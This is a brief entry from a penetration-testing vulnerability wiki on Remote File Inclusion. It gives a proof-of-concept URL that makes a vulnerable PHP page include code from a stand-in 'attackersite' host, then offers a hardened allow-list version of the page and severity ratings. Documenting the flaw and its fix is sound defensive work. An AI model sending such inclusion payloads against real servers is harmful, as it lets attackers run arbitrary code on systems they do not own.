Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Remote File Inclusion

POC

Call a remote file as below:

http://vulnerablehost/vulnpage.php?file=http://attackersite/malicouspage

In this case the remote file is included, and any code it contains is run by the server.
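The following is an added example, not part of the original wiki entry: a hardened version of a page like vulnpage.php that resolves the `file` parameter through an allow-list instead of passing it to `include`. The page names, the `pages/` directory and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example: hardened handling of the ?file= parameter.
// Page names, paths and resolve_page() are hypothetical.

// Vulnerable pattern the POC URL relies on: the request value reaches
// include unchanged, so with allow_url_include=On a remote URL is
// fetched and executed by the server.
//   include $_GET['file'];

// Allow-list: request values map to fixed local files only.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): ?string
{
    // Only exact allow-list keys are accepted. URLs, stream wrappers
    // (php://, data://) and traversal sequences never match a key, so
    // user input never becomes part of the included path.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

$file = $_GET['file'] ?? 'home';

// ?file[]=x makes $_GET['file'] an array; reject anything but a string.
$path = is_string($file) ? resolve_page($file) : null;

if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Page not found');
}

include $path;
```

As defence in depth, keep `allow_url_include = Off` in php.ini (the PHP default), so that a URL reaching `include` elsewhere in the code base is not fetched.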

Impact

Medium-High

Likelihood

Medium-High